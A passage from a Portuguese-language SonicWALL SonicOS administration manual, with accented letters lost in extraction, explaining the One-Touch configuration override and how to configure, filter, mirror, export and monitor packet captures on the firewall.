conformidade com o modo NDPP.
Etapa 3 Clique em OK ou Cancelar.

Para tornar o seu firewall compatvel com o NDPP, use a lista gerada para configurar seu firewall,
removendo as configuraes no permitidas e configurando as definies obrigatrias, conforme
listadas na caixa de dilogo Verificao da definio do modo NDPP.

Configurao One-Touch
O recurso de substituio de configurao One-Touch est configurado na pgina Sistema >
Configuraes. Podemos consider-lo como um rpido ajuste para configuraes de
segurana do dispositivo de segurana de rede da Dell SonicWALL. Com um nico clique, a
substituio de configurao One-Touch aplica mais de sessenta definies de configurao
para implementar as melhores prticas recomendadas da Dell SonicWALL. Essas
configuraes garantem que o dispositivo esteja tirando proveito dos recursos de segurana
da Dell SonicWALL.
H dois conjuntos de configuraes de substituio de configurao One-Touch:
Segurana de firewall estvel e DPI para ambientes de rede com servios de
segurana de DPI (inspeo profunda de pacotes) habilitados, como Gateway Anti-Virus,
Intrusion Prevention, Anti-Spyware e Regras de aplicativos.
Segurana de firewall estvel para ambientes de rede que no possuem servios de
segurana de DPI habilitados, mas ainda desejam empregar melhores prticas
recomendadas de segurana do firewall estvel da SonicWALL.
Ambas as implantaes de substituio de configurao One-Touch implementam as
seguintes configuraes:
Configurar melhores prticas de segurana de administrador
Impor o login de HTTPS e desabilitar o ping
Configurar revinculao de DNS
Configurar as melhores prticas das regras de acesso
Configurar as melhores prticas de configuraes de firewall
Configurar as melhores prticas de proteo contra inundao de Firewall
Configurar as melhores prticas de configuraes avanadas de VPN
Configurar os nveis de log
Habilitar visualizao e relatrios de fluxo
A implantao de segurana de firewall estvel e DPI tambm define as seguintes
configuraes relacionadas a DPI:
Habilitar servios DPI em todas as zonas aplicveis
Habilitar regras de aplicativos
Configurar as melhores prticas do Gateway Anti-Virus
Configurar as melhores prticas do Intrusion Prevention
Configurar as melhores prticas do Anti-Spyware
Cuidado Esteja ciente de que a substituio de configurao One-Touch pode alterar o

comportamento do dispositivo de segurana da SonicWALL. Revise a lista de configuraes
antes de aplicar a substituio de configurao One-Touch.
Em especfico, as configuraes a seguir podem afetar a experincia do administrador:

- Requisitos de senha de administrador na pgina Sistema > Administrao.
- Requerer gerenciamento HTTPS.
- Desabilitar HTTP para redirecionamento HTTPS.
- Desabilitar o gerenciamento de ping.

Captulo 10
Usando o Monitor de pacotes
Sistema > Monitor de pacotes

Nota Para maior convenincia e acessibilidade, a pgina Monitor de pacotes pode ser acessada
em Painel > Monitor de pacotes ou Sistema > Monitor de pacotes. A pgina idntica,
independentemente da guia por meio da qual acessada. Para obter informaes sobre
como usar o Monitor de pacotes, consulte Sistema > Monitor de pacotes na pgina 141.
As sees a seguir fornecem procedimentos detalhados de viso geral e configurao do

Monitor de pacotes:
Viso geral do Monitor de pacotes na pgina 141
Configurando o Monitor de pacotes na pgina 144
Verificando as atividades do Monitor de pacotes na pgina 155
Viso geral do Monitor de pacotes

Esta seo fornece uma apresentao do recurso monitor de pacotes do SonicOS. Esta seo
contm as seguintes subsees:
Definio do Monitor de pacotes na pgina 141
Vantagens do Monitor de pacotes na pgina 142
Como funciona o Monitor de pacotes? na pgina 142
Definio do Espelhos de pacotes na pgina 144
Como funciona o Espelho de pacotes? na pgina 144
Definio do Monitor de pacotes

O Monitor de pacotes um mecanismo que permite o monitoramento de pacotes individuais
de dados que atravessam o dispositivo de firewall SonicWALL. Os pacotes podem ser
monitorados ou espelhados. Os pacotes monitorados contm informaes de dados e de
endereamento. As informaes de endereamento do cabealho do pacote incluem os
seguintes itens:
Identificao da interface
Usando o Monitor de pacotes | 141

Endereos MAC
Tipo de Ethernet
Tipo de Protocolo de Internet (IP)
Endereos IP de origem e destino
Nmeros de portas
Detalhes da carga L2TP
Detalhes das negociaes PPP
possvel configurar o recurso monitor de pacotes na interface de gerenciamento do SonicOS.
A interface de gerenciamento fornece uma maneira de configurar os critrios do monitor,
configuraes de exibio, configuraes de espelho e configuraes do arquivo de
exportao, alm de exibir os pacotes capturados.
Vantagens do Monitor de pacotes

O recurso monitor de pacotes do SonicOS fornece a funcionalidade e a flexibilidade que voc
precisa para examinar o trfego da rede sem o uso de utilitrios externos, como o Wireshark
(anteriormente conhecido como Ethereal). O Monitor de pacotes inclui os seguintes recursos:
Mecanismo de controle com granularidade avanada para filtragem personalizada (Filtro
do monitor)
Configuraes de filtro de exibio independentes das configuraes do filtro do monitor
O status do pacote indica se o pacote foi descartado, encaminhado, gerado ou consumido
pelo firewall
Sada com trs janelas na interface de gerenciamento:
Lista de pacotes
Sada decodificada do pacote selecionado
Despejo hexadecimal do pacote selecionado
Os recursos de exportao incluem formato de texto ou HTML com despejo hexadecimal
dos pacotes, alm do formato de arquivo CAP
Exportao automtica para o servidor FTP quando o buffer estiver cheio
Monitor de pacotes bidirecional com base na porta e endereo IP
Delimitao configurvel do buffer do monitor de pacotes quando estiver cheio
Como funciona o Monitor de pacotes?

Como administrador, possvel definir as configuraes gerais, filtro do monitor, filtro de
exibio, configuraes avanadas de filtro e configuraes de FTP da ferramenta do monitor
de pacotes. Conforme os pacotes da rede forem inseridos no subsistema do monitor de
pacotes, as configuraes de filtro do monitor so aplicadas e os pacotes resultantes so
gravados no buffer de captura. As configuraes de filtro de exibio so aplicadas conforme
o contedo do buffer exibido na interface de gerenciamento. possvel registrar o buffer de
captura para ser exibido na interface de gerenciamento ou configurar a transferncia
automtica para o servidor FTP quando o buffer estiver cheio.

As configuraes padro so fornecidas para que voc possa comear a usar o monitor de
pacotes sem configur-lo primeiro. A funcionalidade bsica a seguinte:
Iniciar: Clique em Iniciar captura para comear a captura de todos os pacotes, exceto daqueles
utilizados para a comunicao entre o firewall e a interface de gerenciamento do sistema
de seu console.
Parar: Clique em Parar captura para interromper a captura do pacote.
Limpar: Clique em Limpar para limpar os contadores de status que so exibidos na parte superior
da pgina do Monitor do pacote.
Atualizar: Clique em Atualizar para exibir novos dados do buffer na janela de Pacotes capturados.
Em seguida, possvel clicar em qualquer pacote na janela para exibir suas informaes
de cabealho e dados nas janelas Detalhes do pacote e Despejo hexadecimal.
Exportar Exibe ou salva um instantneo do buffer atual no formato de arquivo selecionado da lista
como: suspensa. Os arquivos salvos so colocados no sistema de gerenciamento local (onde a
interface de gerenciamento est sendo executada). Escolha um dos formatos a seguir:
Libpcap Selecione o formato Libpcap se deseja exibir os dados com o analisador de
protocolos de rede Wireshark (antigo Ethereal). Ele tambm conhecido como formato lib-
cap ou pcap. Uma caixa de dilogo permite que voc abra o arquivo do buffer com o
Wireshark ou salv-lo no disco rgido local com a extenso .pcap.
HTML Selecione Html para exibir os dados com um navegador. possvel usar
Arquivo > Salvar como para salvar uma cpia do buffer no disco rgido.
Texto Selecione Texto para exibir os dados em um editor de texto. Uma caixa de di-
logo permite que voc abra o arquivo do buffer com o editor de texto registrado ou salv-lo
no disco rgido local com a extenso .wri.
Dados de aplicativos Selecione Dados de aplicativos para exibir apenas os dados de
aplicativo contidos no pacote. Os pacotes que no contm nenhum dado de aplicativo so
ignorados durante a captura. Dados de aplicativos = pacote capturado menos os cabea-
lhos L2, L3 e L4.
Consulte a figura abaixo para exibir uma visualizao de alto nvel do subsistema do monitor
de pacotes. Ela mostra os diferentes filtros e como eles so aplicados.
Display filter is applied

before displaying packets
to the management interface.
Capture Buffer
Remote FTP Server Management Host
Monitor filter is applied

before copying the packet
into the capture buffer.
Packets
- Incoming
- Outgoing
- Generated
- Intermediate

Definio do Espelhos de pacotes
O espelhamento de pacotes o processo de envio de uma cpia de pacotes visualizados em
uma interface para outra interface ou para um dispositivo SonicWALL remoto.
Existem dois aspectos de espelhamento:
Classificao Refere-se identificao de um conjunto selecionado de pacotes que sero
espelhados. Os pacotes de entrada e sada para e de uma interface so comparados com um
filtro. Se eles no forem correspondentes, a ao de espelhamento ser aplicada.
Ao Refere-se ao envio de uma cpia dos pacotes selecionados para uma porta ou um
destino remoto. Os pacotes que correspondem a um filtro de classificao so enviados a um
dos destinos de espelhamento. Um destino especfico de espelho faz parte do identificador de
ao.
Como funciona o Espelho de pacotes?

Cada filtro de classificao est associado a um identificador de ao. At dois identificadores
de ao podem ser definidos, que suportam dois destinos de espelho (uma porta fsica no
mesmo firewall e/ou um firewall SonicWALL remoto). Os identificadores de ao determinam
o modo como um pacote espelhado. Os seguintes tipos de identificadores de ao so
suportados:
Enviar uma cpia para uma porta fsica.
Encapsular o pacote e envi-lo para um dispositivo SonicWALL remoto.
Enviar uma cpia para uma porta fsica com uma VLAN configurada.
A classificao realizada nas guias Filtro do monitor e Filtro avanado do monitor da
janela Configurao do Monitor de pacotes.
Um firewall Sonicwall local pode ser configurado para receber o trfego espelhado
remotamente de um firewall SonicWALL remoto. No firewall local, o trfego espelhado recebido
pode ser salvo no buffer de captura ou enviado para outra interface local. Isso configurado
na seo Configuraes remotas do espelho (Receptor), na guia Espelho da janela de
Configurao do Monitor de pacotes.
O SonicOS oferece suporte para as seguintes opes de espelhamento de pacotes:
Espelhamento de pacotes para uma interface especificada (Espelhamento local).
Espelhamento do trfego selecionado apenas.
Espelhamento do trfego decodificado SSL.
Espelhamento completo de pacotes, incluindo os cabealhos das Camadas 2 e 3, bem
como a carga.
Espelhamento de pacotes para um firewall remoto (Transmisso do espelhamento
remoto).
Receba pacotes espelhados de um dispositivo SonicWALL remoto (Recepo do
espelhamento remoto).
Configurando o Monitor de pacotes

possvel acessar a ferramenta do monitor de pacotes na pgina Painel > Monitor de
pacotes da interface de gerenciamento do SonicOS. Existem seis reas principais de
configurao para o monitor de pacotes, uma das quais serve especificamente para o
espelhamento de pacotes. As sees a seguir descrevem as opes de configurao e
fornecem procedimentos para o acesso e definio das configuraes do filtro, configuraes
do registro e configuraes do espelho:

Definindo as configuraes gerais na pgina 145
Configurando o monitoramento com base em regras do firewall na pgina 146
Definindo as configuraes de filtro do monitor na pgina 147
Definindo as configuraes do filtro de exibio na pgina 148
Definindo as configuraes do registro em log na pgina 150
Definindo as configuraes avanadas de filtro do monitor na pgina 152
Definindo as configuraes do espelho na pgina 154
Definindo as configuraes gerais

Esta seo descreve como definir as configuraes gerais do monitor de pacotes, incluindo o
nmero de bytes que sero capturados por pacote e a opo de encapsulamento do buffer.
possvel especificar o nmero de bytes usando decimais ou hexadecimais, com um valor
mnimo de 64. A opo de encapsulamento do buffer permite que a captura de pacotes
continue mesmo quando o buffer se tornar cheio, substituindo o buffer desde o incio.
Para definir as configuraes gerais, siga as etapas a seguir:
Etapa 1 V at a pgina Painel > Monitor de pacotes e clique em Configurar.

Etapa 2 Na janela Configurao do Monitor de pacotes, clique na guia Configuraes.
Etapa 3 Em Configuraes gerais na caixa Nmero de bytes que sero capturados (por pacote),
digite o nmero de bytes que sero capturados de cada pacote. O valor mnimo 64.
Etapa 4 Para continuar a captura de pacotes aps o preenchimento do buffer, selecione a caixa de
seleo Encapsular buffer de captura quanto estiver cheio. Selecionar esta opo far com
que a captura de pacotes comece a registrar os pacotes capturados no incio do buffer
novamente aps o preenchimento total do buffer. Esta opo no ter nenhum efeito se o
registro em log do servidor FTP estiver habilitado na guia Registro em log, porque o buffer
automaticamente encapsulado quando o FTP estiver habilitado.
Etapa 5 Em Excluir filtro, selecione Excluir trfego de GMS criptografado para impedir a captura ou
o espelhamento do gerenciamento do trfego criptografado ou trfego do syslog de ou para o
SonicWALL GMS. Esta configurao afeta somente o trfego criptografado em um tnel de
GMS primrio ou secundrio configurado. O trfego de gerenciamento de GMS no ser
excludo se ele for enviado por meio de um tnel separado.
Etapa 6 Use as configuraes Excluir o trfego de gerenciamento para impedir a captura ou o
espelhamento do trfego de gerenciamento para o dispositivo. Marque a caixa de seleo para
cada tipo de trfego (HTTP/HTTPS, SNMP ou SSH) que ser excludo. Se o trfego de
gerenciamento for enviado por meio de um tnel, os pacotes no sero excludos.

Etapa 7 Use as configuraes Excluir o trfego do syslog para impedir a captura ou o espelhamento
do trfego de syslog para os servidores do registro em log. Marque a caixa de seleo para
cada tipo de servidor (Servidores do syslog ou Servidor do GMS) que sero excludos. Se
o trfego do syslog for enviado por meio de um tnel, os pacotes no sero excludos.
Etapa 8 Use as configuraes Excluir o trfego interno para para impedir a captura ou o
espelhamento do trfego interno entre o firewall e seu parceiro de Alta Disponibilidade ou um
SonicPoint conectado. Marque a caixa de seleo para cada tipo de trfego (HA ou
SonicPoint) que ser excludo.
Etapa 9 Para salvar suas configuraes e sair da janela de configurao, clique em OK.
Configurando o monitoramento com base em regras do firewall

Os recursos do Monitor de pacotes e Relatrios de fluxo permitem que o trfego seja
monitorado com base em regras do firewall para fluxos de trfego de entrada ou sada
especficos. Esse conjunto de recursos habilitado ao selecionar o monitoramento de fluxos
na rea Firewall > Regras de acesso da interface de gerenciamento do SonicOS.
Para definir as configuraes gerais, siga as etapas a seguir:
Etapa 1 V at a pgina Firewall > Regras de acesso e clique no cone Configurar para a(s) regra(s)
para as quais deseja habilitar o monitoramento de pacotes ou o relatrio de fluxo.
Etapa 2 Selecione a caixa de seleo Habilitar monitor de pacotes para enviar as estatsticas de
monitoramento dos pacotes para esta regra.
Etapa 3 Clique no boto OK para salvar as alteraes.
Nota Um maior nmero de configuraes de filtro do monitor necessrio na pgina Painel >
Monitor de pacotes para habilitar o monitoramento com base em regras do firewall.

Definindo as configuraes de filtro do monitor
Todos os filtros definidos nesta pgina aplicam-se captura de pacotes e ao espelhamento de
pacotes. Para definir as configuraes do Filtro do monitor, siga as etapas a seguir:

Etapa 2 Na janela Configurao do Monitor de pacotes, clique na guia Filtro do monitor.
Etapa 3 Selecione Habilitar filtro com base em regras do firewall se voc estiver usando regras do
firewall para capturar o trfego especfico.
Nota Antes que a opo Habilitar filtro com base em regras do firewall seja selecionada,
verifique se voc selecionou uma ou mais regras de acesso para o monitoramento do
trfego de pacotes. Esta configurao feita na pgina Firewall > Regras de acesso da
interface de gerenciamento do SonicOS.
Etapa 4 Especifique o modo como o Monitor de pacotes filtrar os pacotes usando as opes a seguir:
Nome(s) da interface possvel especificar at dez interfaces separadas por
vrgulas. Consulte a tela Rede > Interfaces na interface de gerenciamento para obter
os nomes de interface disponveis. possvel usar um valor negativo para configurar
todas as interfaces exceto a(s) especificada(s); por exemplo: !X0 ou !LAN.
Tipos de Ethernet possvel especificar at dez tipos de Ethernet separadas por
vrgulas. Atualmente, existe suporte para os seguintes tipos de Ethernet: ARP, IP,
PPPoE-SES e PPPoE-DIS. As duas ltimas podem ser especificadas somente pela
PPPoE. Esta opo no diferencia maisculas de minsculas. Por exemplo, para
capturar todos os tipos suportados, voc poderia inserir: ARP, IP, PPPOE. possvel
usar um ou mais valores negativos para capturar todos os tipos de Ethernet, exceto
aqueles especificados; por exemplo: !ARP, !PPPoE. Tambm possvel usar valores
hexadecimais para representar os tipos de Ethernet ou misturar valores hexadecimais
com as representaes padro; por exemplo: ARP, 0x800, IP. Geralmente, voc usaria

somente valores hexadecimais para os tipos de Ethernet que no so suportados por
acrnimo no SonicOS. Consulte Tipos de pacotes suportados na pgina 159.
Tipo(s) de IP possvel especificar at dez tipos de IP separados por vrgulas. Os
seguintes tipos IP so suportados: TCP, UDP, ICMP, GRE, IGMP, AH, ESP. Esta opo
no diferencia maisculas de minsculas. possvel usar um ou mais valores
negativos para capturar todos os tipos de IP, exceto aqueles especificados; por
exemplo: !TCP, !UDP. Tambm possvel usar valores hexadecimais para representar
os tipos de IP ou misturar valores hexadecimais com as representaes padro; por
exemplo: TCP, 0x1, 0x6. Consulte Tipos de pacotes suportados na pgina 159.
Endereo(s) IP de origem possvel especificar at dez endereos IP separados
por vrgulas; por exemplo: 10.1.1.1, 192.2.2.2. possvel usar um ou mais valores
negativos para capturar pacotes de todos os endereos, exceto os especificados; por
exemplo: !10.3.3.3, !10.4.4.4.
Porta(s) de origem possvel especificar at dez nmeros de porta TCP ou UDP
separadas por vrgulas; por exemplo: 20, 21, 22, 25. possvel usar um ou mais
valores negativos para capturar pacotes de todas as portas, exceto as especificadas;
por exemplo: !80, !8080.
Endereo(s) IP de destino possvel especificar at dez endereos IP separados
por vrgulas; por exemplo: 10.1.1.1, 192.2.2.2. possvel usar um ou mais valores
negativos para capturar pacotes destinados para todos os endereos, exceto os
especificados; por exemplo: !10.3.3.3, !10.4.4.4.
Porta(s) de destino possvel especificar at dez nmeros de porta TCP ou UDP
separadas por vrgulas; por exemplo: 20, 21, 22, 25. possvel usar um ou mais
valores negativos para capturar pacotes destinados para todas as portas, exceto as
especificadas; por exemplo: !80, !8080.
Correspondncia de portas e endereo bidirecional Quando essa opo
selecionada, as portas e endereos IP especificados nos campos de Origem ou
Destino nesta pgina sero comparados com os campos de origem e destino em cada
pacote.
Somente pacotes encaminhados Selecione esta opo para monitorar todos os
pacotes que so encaminhados pelo firewall.
Somente pacotes consumidos Selecione esta opo para monitorar todos os
pacotes que so consumidos por fontes internas dentro do firewall.
Somente pacotes descartados Selecione esta opo para monitorar todos os
pacotes que so descartados no permetro.
Nota Se um campo for deixado em branco, nenhuma filtragem feita nesse campo. Os pacotes
so capturados ou espelhados sem considerar o valor contido no campo de seus
cabealhos.
Definindo as configuraes do filtro de exibio

Esta seo descreve como definir as configuraes do filtro de exibio do monitor de pacotes.
Os valores fornecidos aqui so comparados com os campos correspondentes nos pacotes
capturados e somente os pacotes correspondentes so exibidos. Essas configuraes se
aplicam somente exibio dos pacotes capturados na interface de gerenciamento e no
afetam o espelhamento de pacotes.

Nota Se um campo for deixado em branco, nenhuma filtragem feita nesse campo. Os pacotes
so exibidos sem considerar o valor contido no campo de seus cabealhos.
Para definir as configuraes do filtro de exibio do Monitor de pacotes, siga as etapas a

seguir:

Etapa 2 Na janela Configurao do Monitor de pacotes, clique na guia Filtro de exibio.
Etapa 3 Na caixa Nome(s) da interface, insira as interfaces do firewall para as quais os pacotes
devero ser exibidos ou use o formato negativo (!X0) para exibir os pacotes capturados de
todas as interfaces, exceto aquelas especificadas. possvel especificar at dez interfaces
separadas por vrgulas. Consulte a tela Rede > Interfaces na interface de gerenciamento para
obter os nomes de interface disponveis.
Etapa 4 Na caixa Tipo(s) de Ethernet, insira os tipos de Ethernet para os quais voc deseja exibir os
pacotes ou use o formato negativo (!ARP) para exibir os pacotes de todos os tipos de Ethernet,
exceto aqueles especificados. possvel especificar at dez tipos de Ethernet separados por
vrgulas. Atualmente, existe suporte para os seguintes tipos de Ethernet: ARP, IP, PPPoE-SES
e PPPoE-DIS. As duas ltimas podem ser especificadas somente pela PPPoE. Tambm
possvel usar valores hexadecimais para representar os tipos de Ethernet ou misturar valores
hexadecimais com as representaes padro; por exemplo: ARP, 0x800, IP. Geralmente, voc
usaria somente valores hexadecimais para os tipos de Ethernet que no so suportados por
acrnimo no SonicOS. Consulte Tipos de pacotes suportados na pgina 159.
Etapa 5 Na caixa Tipo(s) de IP, insira os tipos de pacotes IP para os quais voc deseja exibir os
pacotes ou use o formato negativo (!UDP) para exibir os pacotes de todos os tipos de IP, exceto
aqueles especificados. possvel especificar at dez tipos de IP separados por vrgulas. Os
seguintes tipos IP so suportados: TCP, UDP, ICMP, GRE, IGMP, AH, ESP. Tambm possvel
usar valores hexadecimais para representar os tipos de IP ou misturar valores hexadecimais
com as representaes padro; por exemplo: TCP, 0x1, 0x6. Consulte Tipos de pacotes

suportados na pgina 159. Para exibir todos os tipos de IP, deixe o campo em branco.
Etapa 6 Na caixa Endereo(s) IP de origem, insira os endereos IP dos quais voc deseja exibir os
pacotes ou use o formato negativo (!10.1.2.3) para exibir os pacotes capturados de todos os
endereos de origem, exceto aqueles especificados.
Etapa 7 Na caixa Porta(s) de origem, insira os nmeros de porta das quais voc deseja exibir os
pacotes ou use o formato negativo (!25) para exibir os pacotes capturados de todas as portas
de origem, exceto aquelas especificadas.
Etapa 8 Na caixa Endereo(s) IP de destino, insira os endereos IP para os quais voc deseja exibir
os pacotes ou use o formato negativo (!10.1.2.3) para exibir os pacotes com todos os
endereos de destino, exceto aqueles especificados.
Etapa 9 Na caixa Porta(s) de destino, insira os nmeros de porta para as quais voc deseja exibir os
pacotes ou use o formato negativo (!80) para exibir os pacotes com todas as portas de destino,
exceto aquelas especificadas.
Etapa 10 Para a correspondncia dos valores nos campos de origem e destino com as informaes de
origem ou destino de cada pacote capturado, selecione a caixa de seleo Habilitar
Correspondncia de portas e endereo bidirecional.
Etapa 11 Para exibir os pacotes capturados encaminhados pelo firewall, selecione a caixa de seleo
Encaminhados.
Etapa 12 Para exibir os pacotes capturados gerados pelo firewall, selecione a caixa de seleo
Gerados.
Etapa 13 Para exibir os pacotes capturados consumidos pelo firewall, selecione a caixa de seleo
Consumidos.
Etapa 14 Para exibir os pacotes capturados descartados pelo firewall, selecione a caixa de seleo
Descartados.
Definindo as configuraes do registro em log

Esta seo descreve como definir as configuraes do registro em log do Monitor de pacotes.
Essas configuraes fornecem uma maneira de configurar o registro automtico em log do
buffer de captura para um servidor FTP externo. Quando o buffer estiver cheio, os pacotes so
transferidos para o servidor FTP. A captura continua sem interrupo.
Se voc configurar o registro automtico em log do FTP, isso substituir a configurao de
encapsulamento do buffer quando ele estiver cheio. Com o registro automtico em log do FTP,
o buffer de captura encapsulado de forma eficaz quando ele estiver cheio, mas tambm
possvel manter todos os dados em vez de substitu-los sempre que o buffer for encapsulado.

Para definir as configuraes do registro em log, siga as etapas a seguir:

Etapa 2 Na janela Configurao do Monitor de pacotes, clique na guia Registro em log.
Etapa 3 Na caixa Endereo IP do servidor FTP, insira o endereo IP do servidor FTP.
Nota Verifique se o endereo IP do servidor FTP alcanvel pelo firewall. No h suporte para
um endereo IP que seja alcanvel somente por meio de um tnel VPN.
Etapa 4 Na caixa ID de login, insira o nome do login que o firewall deve usar para se conectar ao
servidor FTP.
Etapa 5 Na caixa ID de senha, insira o nome da senha que o firewall deve usar para se conectar ao
servidor FTP.
Etapa 6 Na caixa Caminho do diretrio, insira o local do diretrio para os arquivos transferidos. Os
arquivos so registrados neste local, referentes ao diretrio raiz do FTP padro. Para o formato
libcap, os arquivos so nomeados packet-log--<>.cap, onde o <> contm um nmero de
execuo e data, incluindo hora, dia, ms e ano. Por exemplo, packet-log--3-22-08292006.cap.
Para o formato HTML, os nomes dos arquivo esto no formulrio: packet-log_h-<>.html. Um
exemplo de um nome de arquivo HTML : packet-log_h-3-22-08292006.html.
Etapa 7 Para ativar a transferncia automtica do arquivo de captura para o servidor FTP quando o
buffer estiver cheio, selecione a caixa de seleo Registrar em log no servidor FTP
automaticamente. Os arquivos so transferidos nos formatos libcap e HTML.
Etapa 8 Para habilitar a transferncia do arquivo no formato HTML, bem como no formato libcap,
selecione Registrar em log o arquivo HTML junto com o arquivo .cap (FTP).
Etapa 9 Para testar a conexo com o servidor FTP e transferir o contedo do buffer de captura para
ele, clique em Registrar em log agora. Nesse caso, o nome do arquivo conter um F. Por
exemplo, packet-log-F-3-22-08292006.cap ou packet-log_h-F-3-22-08292006.html.

Reiniciar o registro em log do FTP
Se o registro automtico em log do FTP estiver desativado devido a uma falha de conexo ou
uma conexo simplesmente desativada, possvel reinici-lo em Configurar > Registro em
log.

Etapa 2 Na janela Configurao do Monitor de pacotes, clique na guia Registro em log.
Etapa 3 Verifique se as configuraes esto corretas para todos os itens da pgina. Consulte Definindo
as configuraes do registro em log na pgina 150.
Etapa 4 Para alterar o status do registro em log do FTP na pgina principal do monitor de pacotes para
ativo, selecione a caixa de seleo Registrar em log no servidor FTP automaticamente .
Definindo as configuraes avanadas de filtro do monitor

Esta seo descreve como configurar o monitoramento dos pacotes gerados pelo firewall e
para o trfego intermedirio.

Etapa 2 Na janela Configurao do Monitor de pacotes, clique na guia Filtro avanado do monitor.
Etapa 3 Para monitorar os pacotes gerados pelo firewall, selecione a caixa de seleo Monitorar
pacotes gerados pelo firewall.

Mesmo quando outros filtros do monitor no forem correspondentes, essa opo garante que
os pacotes gerados pelo firewall sejam capturados. Isto inclui os pacotes gerados por
servidores HTTP(S), L2TP, DHCP, PPP, PPPOE e protocolos de roteamento. Os pacotes
capturados so marcados com s na rea de interface de entrada quando eles so
provenientes da pilha do sistema. Caso contrrio, a interface de entrada no ser especificada.
Etapa 4 Para monitorar os pacotes intermedirios gerados pelo firewall, selecione a caixa de seleo
Monitorar pacotes intermedirios. Selecionar esta caixa de seleo habilita, mas no
seleciona, as caixas de seleo subsequentes para o monitoramento de tipos especficos de
trfego intermedirio.
Etapa 5 Selecione a caixa de seleo para qualquer uma das opes a seguir para monitorar esse tipo
de trfego intermedirio:
Monitorar trfego intermedirio de multicast Captura ou espelha o trfego de
multicast replicado.
Monitorar trfego auxiliar intermedirio do IP Captura ou espelha Pacotes auxiliares
do IP replicados.
Monitorar trfego intermedirio reagrupado Captura ou espelha pacotes do IP
reagrupados.
Monitorar trfego intermedirio fragmentado Captura ou espelha pacotes
fragmentados pelo firewall.
Monitorar trfego espelhado intermedirio remoto Captura ou espelha pacotes
espelhados remotos aps o desencapsulamento.
Monitorar trfego intermedirio do IPsec Captura ou espelha pacotes do IPSec aps
a criptografia e decodificao.
Monitorar trfego intermedirio decodificado do SSL Captura ou espelha pacotes
SSL decodificados. Alguns campos do cabealho do IP e TCP podem no ser precisos
nos pacotes monitorados, incluindo as somas de verificao do IP e TCP e os nmeros
de porta TCP (remapeados para a porta 80). O DPI-SSL deve estar habilitado para
decodificar os pacotes.
Monitorar trfego intermedirio decodificado do LDAP sobre os pacotes TLS Captura
ou espelha os pacotes LDAPS decodificados. Os pacotes so marcados com (ldp)
nos campos de interface de entrada/sada e tero cabealhos Ethernet, IP e TCP
fictcios com alguns campos no precisos. O servidor do LDAP est definido para 389.
As senhas de solicitaes de ligao LDAP capturadas so confusas.
Monitorar mensagens decodificadas de agentes intermedirios de Login nico
Captura ou espelha mensagens decodificadas de ou para o Agente SSO. Os pacotes
so marcados com (sso) nos campos de interface de entrada/sada e tero
cabealhos Ethernet, IP e TCP fictcios com alguns campos no precisos.
Nota Os filtros do monitor ainda so aplicados a todos os tipos de trfego intermedirio.

Definindo as configuraes do espelho
Esta seo descreve como definir as configuraes do espelho do Monitor de pacotes. As
configuraes do espelho fornecem uma maneira de enviar pacotes a uma porta fsica
diferente do mesmo firewall ou de enviar ou receber pacotes de um firewall SonicWALL remoto.
Para definir as configuraes do espelho, siga as etapas a seguir:

Etapa 2 Na janela Configurao do Monitor de pacotes, clique na guia Espelho.
Etapa 3 Em Configuraes do espelho, insira a taxa mxima do espelho desejada no campo Taxa
mxima do espelho (em quilobits por segundo). Se essa taxa for ultrapassada durante o
espelhamento, os pacotes em excesso no sero espelhados e sero contados como pacotes
ignorados. Esta configurao aplica-se ao espelhamento local e remoto. O valor padro e
mnimo de 100 kbps e o valor mximo de 1 Gbps.
Etapa 4 Selecione a caixa de seleo Espelhar somente pacotes do IP para impedir o espelhamento
de outros pacotes do tipo Ethernet, como ARP ou PPPoE. Se for selecionada, esta opo
substitui todos os tipos de Ethernet fora do IP selecionados na guia Filtro do monitor.
Etapa 5 Em Configuraes do espelho local, selecione a interface de destino para os pacotes
espelhados localmente na lista suspensa Espelhar pacotes filtrados para a interface.
Etapa 6 Em Configuraes do espelho remoto (Remetente), no campo Espelhar pacotes filtrados
para o firewall Sonicwall remoto (Endereo IP) insira o endereo IP do SonicWALL remoto
para o qual os pacotes espelhados sero enviados.

Nota O SonicWALL remoto deve ser configurado para receber os pacotes espelhados.
Etapa 7 No campo Criptografar pacotes espelhados remotos via IPSec (chave IKE pr-
compartilhada), insira a chave pr-compartilhada que ser utilizada para criptografar o trfego
ao enviar pacotes espelhados para o firewall remoto. Configurar este campo habilitar o tnel
do modo de transporte IPSec entre este dispositivo e o firewall remoto. Esta chave pr-
compartilhada utilizada pelo IKE para negociar as chaves do IPSec.
Etapa 8 Em Configuraes do espelho remoto (Receptor), no campo Receber pacotes espelhados
para o firewall Sonicwall remoto (Endereo IP) insira o endereo IP do SonicWALL remoto
para o qual os pacotes espelhados sero enviados.
Nota O SonicWALL remoto deve ser configurado para enviar os pacotes espelhados.
Etapa 9 No campo Decodificar pacotes espelhados remotos via IPSec (chave IKE pr-
compartilhada), insira a chave pr-compartilhada que ser utilizada para decodificar o trfego
ao receber pacotes espelhados do firewall remoto. Configurar este campo habilitar o tnel do
modo de transporte IPSec entre este dispositivo e o firewall remoto. Esta chave pr-
compartilhada utilizada pelo IKE para negociar as chaves do IPSec.
Etapa 10 Para espelhar os pacotes recebidos para outra interface no SonicWALL local, selecione a
interface na lista suspensa Enviar pacotes espelhados remotos recebidos para a interface.
Etapa 11 Para salvar os pacotes recebidos no buffer de captura local, selecione a caixa de seleo
Enviar pacotes espelhados remotos recebidos para o buffer de captura. Essa opo no
depende do envio dos pacotes recebidos para outra interface e as duas podem ser ativadas,
se desejado.
Verificando as atividades do Monitor de pacotes

Esta seo descreve como saber se seu monitor de pacotes, espelhamento ou registro em log
do FTP est funcionando corretamente de acordo com a configurao. Ela contm as
seguintes sees:
Noes bsicas sobre os indicadores de status na pgina 155
Limpando as informaes de status na pgina 158
Noes bsicas sobre os indicadores de status

A pgina principal do Monitor de pacotes exibe os indicadores de status para a captura de
pacotes, espelhamento e registro em log do FTP. Dicas de ferramentas com informaes em
pop-up esto disponveis para a exibio rpida das definies de configurao.

Consulte as sees a seguir:
Status da captura de pacotes na pgina 156
Status de espelhamento na pgina 156
Status de registro em log do FTP na pgina 157
Estatsticas atuais do buffer na pgina 157
Configuraes atuais na pgina 158
Status da captura de pacotes

O indicador de status da captura de pacotes rotulado como Rastreamento e mostra uma das
trs condies a seguir:
Vermelho A captura foi interrompida
Verde A captura est sendo executada e o buffer no est cheio
Amarelo A captura est sendo executada, mas o buffer est cheio
A interface de gerenciamento tambm exibe o tamanho do buffer, o nmero de pacotes
capturados, a porcentagem de espao utilizada no buffer e a quantidade de perda do buffer.
Pacotes perdidos ocorrem quando o registro automtico em log do FTP est ativado, mas a
